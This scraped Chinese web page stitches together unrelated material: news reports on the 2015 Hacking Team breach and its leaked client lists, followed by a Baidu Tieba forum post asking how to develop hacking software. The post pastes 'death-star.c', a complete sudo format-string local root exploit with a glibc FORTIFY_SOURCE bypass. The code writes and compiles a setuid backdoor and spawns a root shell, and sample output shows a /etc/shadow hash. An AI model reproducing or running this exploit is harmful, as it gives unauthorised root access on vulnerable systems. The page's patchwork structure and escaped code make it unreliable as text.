手机黑客软件件谁能开发

您所在的位置: &
黑客公司Hacking Team被黑 泄露大量内部资料及攻击工具
黑客公司Hacking Team被黑 泄露大量内部资料及攻击工具
Hacking Team是一家以协助政府监视公民而“闻名于世”的意大利公司,他们向包括摩洛哥、埃塞俄比亚以及美国毒品管制局在内的政府及执法机构出售入侵和监视工具。而这两天他们居然被黑了!
Hacking Team是一家以协助政府监视公民而&闻名于世&的意大利公司,他们向包括摩洛哥、埃塞俄比亚以及美国毒品管制局在内的政府及执法机构出售入侵和监视工具。而这两天他们居然被黑了!
&Hacking Team&反被&Hacked&
作为一家专业从事监视技术的黑客团队及公司,Hacking Team(以下简称HT)今天亲身体验了内部数据被公之于众的感受。
因为HT的商业行为以及他们为政府开发的媒体监控工具达芬奇(Da Vinci),无国界记者组织()将HT列为&网络敌人索引&(Enemies of the Internet index),
目前尚不清楚是什么组织攻击了HT,然而袭击者对公众发布了多达400GB的(含有客户端文件、合同、财务等)内部文件、源代码以及电子邮件,可供下载。
此外,攻击者黑掉了Hacking Team的Twitter账户,丑化了logo、简介以及将黑客获得的内部消息通过被害者HT 的Twitter发布于众。
事件进展(更新)
& Christopher Soghoian表示,从公布的文件来看,HT的客户主要有韩国、哈萨克斯坦、沙特阿拉伯、阿曼、黎巴嫩和蒙古。然而,该公司坚称他们不与专制政府做生意。
& 研究人员已经开始从曝光的文件中寻找交易商品信息。其中一个项目发票显示为58000欧元,对象是埃及,用于HT的RCS exp通道(RCS Exploit Portal)。
& Motherboard曾揭露美国毒品管制局(DEA)以240万美元的价格秘密从HT购买间谍软件。
& 泄密发票显示了埃塞俄比亚曾支付1000万比尔(埃塞俄比亚货币)用于远程控制系统、专业服务及通讯设备交易。
& HT曾表示,&打算在你的政府级监控软件中运用一些Oday漏洞利用攻击吗?那么每年再加50000。&
& 有记者通过Twitter直接消息与攻击HT的黑客取得联系,询问他们是否可以发表评论。黑客(们)最初的反映是:&当然好。&
& 有许多安全研究人员和人权活动家认为此次攻击充满讽刺:
Christopher Soghoian:有史以来最棒的透明度报告,@Hacking Team
HT竞争对手Finfisher
几乎在一年之前,另一家科技监控公司Finfisher遭遇了同样方式的黑客入侵,泄露400GB的内部文件。
与HT相同,Finfisher向世界各地执法机构出售监控软件。他们的软件一旦被偷偷安装在目标手机或者电脑后,便可以用来监视目标,如电话、短信、Skype或邮件。运营商还可以打开目标的网络摄像头并从设备中提取文件。
从今天泄露的一封内部电子邮件显示,HT当时对于Finfisher的遇袭表示好不得意,&一个想要成为我们的竞争对手已经被严重攻击了&。
客户坐标大曝光
周日晚攻击者泄露的内部文件显示,HT客户存在于以下一些地点:
埃及、埃塞俄比亚、摩洛哥、尼日利亚、苏丹&&&&
智利、哥伦比亚、厄瓜多尔、洪都拉斯、墨西哥、巴拿马、美国
阿塞拜疆、哈萨克斯坦、马来西亚、蒙古、新加坡、韩国、泰国
乌兹别克斯坦、越南、澳大利亚、塞浦路斯、捷克、德国、匈牙利
意大利、卢森堡、波兰、俄罗斯、西班牙、瑞士、巴林、阿曼
沙特阿拉伯、阿联酋
HT发言人Eric Rabe并没有立即回复记者的电话及邮件询问被泄露的信息是否合法。
一个黑客项目价值约40万
在分享的种子中,邮件是最大的,将近200G:
据说种子内的一个项目值5.8万欧元,换算过来具体多少呢?容小编算算:
Hacking Team泄密资料
链接:&密码:df3e
最后,让我们看看这款臭名昭著的黑客工具&&&达芬奇&的简介吧,挺炫的!
400GB的猛料曝出,相信会有源源不断地&好资讯&向我们迎面扑来。
【责任编辑: TEL:(010)】
关于&&&&的更多文章
近日,有“互联网军火库”之称的意大利监控软件厂商Hacking Team
虽然网购有诸多优点,越来越多的人热衷于此,但网购的安全性也逐渐凸显
讲师: 313人学习过讲师: 10197人学习过讲师: 1639人学习过
无线网络为我们的生活工作带来很大便利,同时也让很多
中国网络安全大会凭借其独特资源优势和平台优势,在主
继“心脏流血”漏洞之后,安全研究专家又在Linux系统
本书对前沿而又成熟的系统分析技术和方法进行了讨论,包括CMM与过程改进、J2EE与NET平台、中间件及相关技术、应用服务器、Web
51CTO旗下网站您的位置: >> 正文
一家黑客工具开发商被黑了 还扯出很多秘密
  一家专门向政府出售黑客软件的公司刚刚被黑了,而入侵者周日晚些时候曝光的文件显示,该公司将监控技术出售给了数十个国家或地区,包括苏丹、埃及、俄罗斯和美国。
  这家意大利公司名为Hacking Team,又称HTS.r.l.,是为数不多的几家向全世界执法机构出售监控工具的公司之一。该公司的技术与犯罪分子使用的“恶意软件”相似,后者专门窃取用户电脑中的个人信息。
  包括监控软件在内,现成的监控技术市场已经实现了大幅增长。2011年,一位行业老兵曾经估计该市场的规模已经达到50亿美元。
  Hacking Team表示,该公司的工具可以帮助调查人员获取各种信息,甚至也包括加密通讯信息。
  由于监控对象可能包括异见人士和记者,因此该行业广受诟病。HackingTeam在官方网站上表示,倘若有可信消息表明其产品会被用于“侵犯人权”,他们便不会向某些国家或地区出售产品。
  Hacking Team联合创始人马考·瓦勒里(MarcoValleri)2011年接受采访时表示,该公司“完全遵守”国际法。“欧洲和美国都有专门的黑名单,将不友好的国家列入其中。我们只能向友好的国家出售软件。”他说。
  多伦多大学公民实验室2014年发布的报告显示,埃塞俄比亚、苏丹、阿曼、埃及等国家或地区都在使用HackingTeam的产品。这些研究人员表示,在美国的埃塞俄比亚记者就遭到了该公司软件的监控。但HackingTeam当时表示,他们并没有将服务出售给专制政权。
  上周日发布的文件包括了一些发票和账目,表明该公司曾经向苏丹、阿塞拜疆和埃及等国家或地区出售过监控软件。
  这些国家的官员尚未发表评论。
  Hacking Team驻美国发言人埃里克·拉比(EricRabe)表示,该公司“正在调查”此事,但不会“证实客户身份或其所在地区”。他并未直接对上述文件的真实性作出回应。
  拉比说:“我们认为这是一种非法监控和盗窃行为,肯定触犯了法律。”他还表示,由于该公司的系统遭受攻击,因此他们已经建议客户暂停调查活动,直到彻底查明状况为止。
  上述文件是通过新西兰文件托管服务分享的,其中包含了一份2012年由Hacking Team开具给InfoTeCSJSC的发票,后者是一家俄罗斯电脑安全公司。InfoTeCS网站上的信息显示,该公司获得了俄罗斯联邦安全局和国防部的授权,负责开发加密技术和保护国家机密。
  InfoTeCS似乎支付了这笔费用。2013年11月,Hacking Team发送了一份一年期的续约文件。但InfoTeCS并未对此置评。
  其他文件则表明,HackingTeam似乎向苏丹出售了监控软件,该国一直因为政治迫害而遭到国际社会的谴责,联合国过去10年也一直对该国实施武器禁运措施。这些文件中包含两张2012年开具给苏丹国家情报和安全局的发票,以及与联合国制裁委员会的沟通信件。
  联合国代表在这些信件中表示,这类软件可能被视作武器设备,因此应当禁止向苏丹出售。HackingTeam则表示,该公司的软件并非武器或军事装备,因此不应当受到武器禁运政策的约束。
  Hacking Team表示,该公司目前与苏丹不存在任何联系,但拒绝讨论之前的行为。
  拉比称,HackingTeam之前认为自家软件与战斗机、火箭和炸弹不同。从今年1月开始,该公司已经受到新的国际协议的监管,这项协议对科技产品在民用和军用领域的使用方式作出了规定。
  “我们已经与意大利政府展开了合作,并且全面落实了该协议。”拉比说。
  联合国代表尚未对上述文件发表评论。
  电脑安全研究人员表示,此次被黑事件可能加剧有关此类监控工具的争议。“我不认为任何一个出售监控软件的人会不了解人权问题。”公民实验室高级研究员摩根·马奎斯-鲍伊尔(MorganMarquis-Boire)说。
  但他表示,如果就此限制黑客工具交易,也有可能引发争议,因为这也会导致电脑安全人员无法跨境分享信息。
  此次披露的文件也表明,Hacking Team曾经向美国政府出售过黑客工具。HackingTeam在美国马里兰州设立了一个办事处,专门为北美和南美的客户提供服务。一份“客户概览列表”显示,该公司在年间向美国联邦调查局(FBI)和缉毒局(DEA)出售了100多万美元的软件授权和维护服务。2013年,DEA收到了17万美元的帐单,涉及软件续约和升级,以及“在波哥大的培训”。
  美国司法部尚未对此置评。(长歌)
[] [] []
[责任编辑: 赵紫东]
新华网重庆频道编辑部 电话:023-
扫描二维码 关注更多重庆精彩
黄桷树下,讲述城市的故事,见证城市的变迁,记录城市的点滴…一个黑客软件的开发! 求大神赐教 !_c语言吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:399,056贴子:
一个黑客软件的开发! 求大神赐教 !收藏
/* death-star.c sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass by aeon -
This PoC exploits: - CVE- - FORTIFY_SOURCE format string protection bypass via "nargs" integer overflow - CVE- - sudo v1.8.0-1.8.3p1 "sudo_debug" format string
Tested on: - Fedora core 16 verne - glibc 2.14.90.14 release - sudo 1.8.1p2
Notes: - This exploit actually turned out very reliable :-)
- You can make a cleaner version of this exploit if you smash sudo_debug function pointer
or a libc function pointer so you dont write to disk. I wont be releasing that version :-) References and thanks too: -
- "A Eulogy for Format Strings" [aeon tmp]$ gcc death-star.c -o death-star[aeon tmp]$ ./death-star [+] Targeting release: 3.1.0-7.fc16.i686.PAE[+] Found vuln glibc version: 2.14.90[+] Found a vuln sudo version: 1.8.1[+] Writing backdoor: e.c[+] Compiling backdoor: e[+] Writing SUDO_ASKPASS file: e.sh[+] Press enter when ready...& -------------- REMOVED --------------&
A�AF@F@F@F@F from LD_PRELOAD cannot be preloaded: ignored. %% %: settings: = %% %: settings: = %% %: sudo_mode Sorry, try again.Sorry, try again.Sorry, try again.%20$08n %*482$ %*2850$ %$: 3 incorrect password attempts %% %: policy plugin returns [+] Getting root..![+] Cleaning system.[+] Launching root shell!sh-4.2# uname -auid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023Linux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC
i686 i386 GNU/Linuxsh-4.2# head -n1 /etc/shadowroot:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:99:7:::sh-4.2#*/#include &sys/resource.h&#include &sys/utsname.h&#include &gnu/libc-version.h&#include &stdlib.h&#include &unistd.h&#include &stdio.h&#include &sys/time.h&#include &sys/stat.h&#include &string.h&#include &sys/wait.h&#define OFFSET
65000#define NUM_THREADS
0/* files that we create on disk */#define BACKDOOR
"e.c"#define BD_COMPILED
"e"#define SUDO_ASKPASS "e.sh"extern char **void *kill_sudo();void *pop_shell();void *set_env();int is_glibc_vuln();int is_sudo_vuln();int write_backdoor();/* hardcoded path to sudo */const char sudo[] = "/usr/bin/sudo\0";char s_version[20];/* vuln versions of sudo */char vuln_sudo_versions[4][20] = {
{"1.8.0"},
{"1.8.1"},
{"1.8.2"},
{"1.8.3"}};/* vuln versions of glibc */char vuln_glibc_versions[4][20] = {
{"2.14.90"},};int main(int argc, char *argv[]){
uname(&ver);
printf("[+] Targeting release: %s\n", ver.release);
if (is_glibc_vuln()){
if(is_sudo_vuln()){
if (write_backdoor()){
printf("[+] Press enter when ready...");
scanf("%c", &ready);
}else{ exit(0); }
}else{ exit(0); }
}else{ exit(0); }
// ulimited stack
rara.rlim_max = rara.rlim_cur = -1;
setrlimit(RLIMIT_STACK, &rara);
if((pid = fork()) & 0)
printf("[-] An error occurred while forking sudo\n");
return -1;
else if(pid == 0){
set_env();
kill_sudo();
wait(&status);
if (WIFEXITED(status)) {
pop_shell();
}}int is_glibc_vuln(){
int i, returnval = -1;
for (i = 0; i & 4; i++){
if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){
printf("[+] Found vuln glibc version: %s\n", gnu_get_libc_version());
returnval = 1;
} };int is_sudo_vuln(){
int i, returnval = -1;;
char path[20];
char sudo_ver_cmd[50];
snprintf(sudo_ver_cmd, sizeof(sudo)+3,"%s -V", sudo);
fp = popen(sudo_ver_cmd, "r");
if (fp == NULL) {
printf("[-] Failed to get sudo's version\n[-]Exiting.." );
fgets(path, 21, fp);
memmove (s_version, path+13,5);
for (i = 0; i & 4; i++){
if (strcmp(s_version, vuln_sudo_versions[i]) == 0){
printf("[+] Found a vuln sudo version: %s\n", s_version);
returnval = 1;
} };int write_backdoor(){
int returnval = 1;
char askpass[100], compile_bd[100];
char bdcode[] = "#include &stdio.h&\r\n"
"#include &stdlib.h&\r\n"
"int main(int argc, char **argv){\r\n"
printf(\"[+] Getting root..!\\n\");\r\n"
setresuid(0,0,0);\r\n"
printf(\"[+] Cleaning system.\\n\");\r\n"
remove(\"e\"); remove(\"e.c\"); remove(\"e.sh\");\r\n"
printf(\"[+] Launching root shell!\\n\");\r\n"
system(\"/bin/sh\");\r\n"
exit(0);\r\n"
FILE *fp = fopen(BACKDOOR,"wb");
if (fp == NULL) {
printf("[-] Failed to write backdoor on the target, check your permissions\n" );
returnval = -1;
printf("[+] Writing backdoor: %s\n", BACKDOOR);
fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);
memset(compile_bd, 0x00, sizeof(compile_bd));
snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,"/usr/bin/gcc %s -o %s", BACKDOOR, BD_COMPILED);
printf("[+] Compiling backdoor: %s\n", BD_COMPILED);
fp = popen(compile_bd, "r");
if (fp == NULL) {
printf("[-] Failed to compile the backdoor, check the gcc path\n" );
returnval = -1;
fclose(fp);
memset(askpass, 0x00, sizeof(askpass));
snprintf(askpass, sizeof(BD_COMPILED)*2+39,"#!/bin/sh\nchown root:root %s\nchmod 4777 %s\n", BD_COMPILED, BD_COMPILED);
fp = fopen(SUDO_ASKPASS,"w");
if (fp == NULL) {
printf("[-] Failed to write backdoor on the target, check your permissions\n" );
returnval = -1;
printf("[+] Writing SUDO_ASKPASS file: %s\n", SUDO_ASKPASS);
fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);
chmod(SUDO_ASKPASS, 0755); };void *set_env(){
int i = 0;
char ld_preload_evar[OFFSET] = "LD_PRELOAD=";
char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};
char sudo_askpass_evar[40];
for (i=0; i&(OFFSET/4); i++){
memcpy(user_details+(i*4), user_details, sizeof(int));
memmove (ld_preload_evar+11, user_details , sizeof(user_details));
memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));
snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,"SUDO_ASKPASS=%s", SUDO_ASKPASS);
// set our environment
putenv(ld_preload_evar);
putenv(sudo_askpass_evar);};void *kill_sudo(){
char fmtstring[] = "%20$08n %*482$ %*2850$ %$";
char *args[] = { fmtstring, "-D9", "-A", "", NULL};
// trigger the vuln
execve(sudo, args, environ);};void *pop_shell(){
// set our environment
unsetenv("LD_PRELOAD");
unsetenv("SUDO_ASKPASS");
char *exploit_args[] = { BD_COMPILED, NULL };
execve(BD_COMPILED, exploit_args, environ);};
好长。。。。
有什么用?我是新手!
登录百度帐号推荐应用
为兴趣而生,贴吧更懂你。或

我要回帖

更多关于 易语言黑客软件开发 的文章

 

随机推荐